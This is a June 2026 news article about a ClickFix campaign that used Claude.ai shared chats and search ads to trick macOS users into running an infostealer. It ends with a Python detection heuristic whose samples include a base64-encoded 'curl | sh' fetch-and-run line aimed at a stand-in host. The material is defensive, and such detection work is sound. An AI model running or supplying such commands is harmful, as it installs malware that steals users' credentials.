Industry News & Leadership · Jun 18, 2026

Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions

Source: Cybersecurity News. Archived Jun 18, 2026.



By Abinaya, June 18, 2026

Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions. According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness.

The operation marks a significant evolution in ClickFix tactics, shifting from traditional malicious hosting to trusted platforms like Claude.ai. The campaign initially relied on GitLab Pages, using over 90 malicious subdomains hosted under the trusted *.gitlab.io domain. These pages impersonated popular AI developer tools, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. By leveraging Google Ads, threat actors targeted users actively searching for these tools, increasing the likelihood of interaction from technically skilled individuals.

ClickFix attacks rely on tricking users into manually executing malicious commands. In this campaign, victims were instructed to copy and paste terminal or PowerShell commands under the pretense of installing or fixing software.

Claude Shared Chats Abused for ClickFix Attacks

This technique bypasses many traditional security controls because the user unknowingly executes the payload. The campaign escalated significantly in May 2026, when attackers pivoted to abusing Claude.ai’s shared chat feature.

[Figure: Claude Malvertising Campaign Infection Chain (Source: TrendMicro)]

Instead of directing victims to suspicious domains, malicious ads redirected users to legitimate Claude.ai shared chat URLs. These pages appeared trustworthy, effectively bypassing browser warnings, URL inspection, and Safe Browsing protections.
Once on the page, victims encountered fake support conversations impersonating entities such as Apple Support or development teams. These chats provided step-by-step instructions for opening a terminal and executing a command. The command typically included a base64-encoded script that, once decoded, fetched a second-stage payload.

[Figure: Top 20 Countries Targeted by the Campaign (Source: TrendMicro)]

Analysis revealed that the payload delivered the MacSync infostealer, which targets macOS systems. The malware collects browser credentials, cookies, SSH keys, and cryptocurrency wallet data, then exfiltrates them to attacker-controlled servers. Notably, the malware includes a check for Russian keyboard layouts, likely to avoid infecting systems in CIS regions. The campaign’s geographic targeting was heavily concentrated in the Asia-Pacific region, which accounted for over 67 percent of victims.

[Figure: “Running Claude Code on Mac” – A Shared Chat Posing as Apple Support (Source: TrendMicro)]

Taiwan alone represented more than 30 percent of observed traffic, followed by Japan and Singapore. Later waves expanded targeting to countries including India, France, and Italy, indicating ongoing optimization of ad targeting strategies. TrendAI researchers observed at least 45 malicious Claude.ai shared chat instances in early stages, increasing to over 60 in later waves. This shift to trusted infrastructure removes many traditional detection signals, leaving user awareness as the primary defense.

[Figure: Top 10 Countries by Confirmed Victim Interactions (Source: TrendMicro)]

Following responsible disclosure, Anthropic took action by banning the malicious accounts, removing harmful shared chats, and implementing additional safeguards to prevent abuse of the feature. Security experts warn that this campaign highlights a broader trend where attackers weaponize legitimate platforms to evade detection. As AI tools become more embedded in developer workflows, such abuse is expected to increase.
Organizations are advised to educate users about ClickFix-style attacks, monitor unusual command execution, and deploy endpoint detection solutions. Users should avoid installing software via search ads, verify URLs carefully, and never execute commands from untrusted sources.
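The advice to monitor unusual command execution can be applied directly to the pasted-command pattern described above, where a base64-encoded script decodes to a second-stage fetch. The following triage heuristic for process command lines is an added example, not code from the article or from TrendAI Research; the rule patterns, verdict labels and sample command lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# A run of base64 alphabet long enough to hold a short script.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# The command decodes data and hands the result to an interpreter.
DECODE_TO_SHELL = re.compile(
    r"base64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b|-enc(odedcommand)?\b",
    re.I | re.S)
# The decoded text retrieves further content over the network.
FETCH = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest)\b", re.I)

def decoded_blobs(cmdline):
    """Decode each base64 run; keep only results that are printable text."""
    texts = []
    for run in B64_RUN.findall(cmdline):
        run = run.rstrip("=")
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            # PowerShell's encoded commands are UTF-16LE, shell ones UTF-8.
            text = raw.decode("utf-16-le" if raw[1:2] == b"\x00" else "utf-8")
        except (binascii.Error, ValueError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            texts.append(text)
    return texts

def assess(cmdline):
    """Return (verdict, reasons) for one process command line."""
    reasons = []
    if DECODE_TO_SHELL.search(cmdline):
        reasons.append("decodes data into an interpreter")
    if any(FETCH.search(t) for t in decoded_blobs(cmdline)):
        reasons.append("embedded base64 decodes to a network fetch")
    verdict = "alert" if len(reasons) == 2 else "review" if reasons else "ok"
    return verdict, reasons

# Constructed sample command lines (not from the campaign); .invalid never resolves.
STAGE1_B64 = base64.b64encode(
    b"curl -fsSL https://stage2.example.invalid/i.sh | sh").decode()
SAMPLES = [
    f"/bin/zsh -c echo {STAGE1_B64} | base64 -D | zsh",
    "/bin/zsh -c base64 -d notes.b64 | zsh",
    "/bin/zsh -c curl -fsSL https://brew.example.invalid/install.sh -o install.sh",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line)[0], "|", line[:60])
```

Only the combination of both signals raises an alert; a single signal is left for analyst review, since decoding a file into a shell also appears in legitimate install scripts.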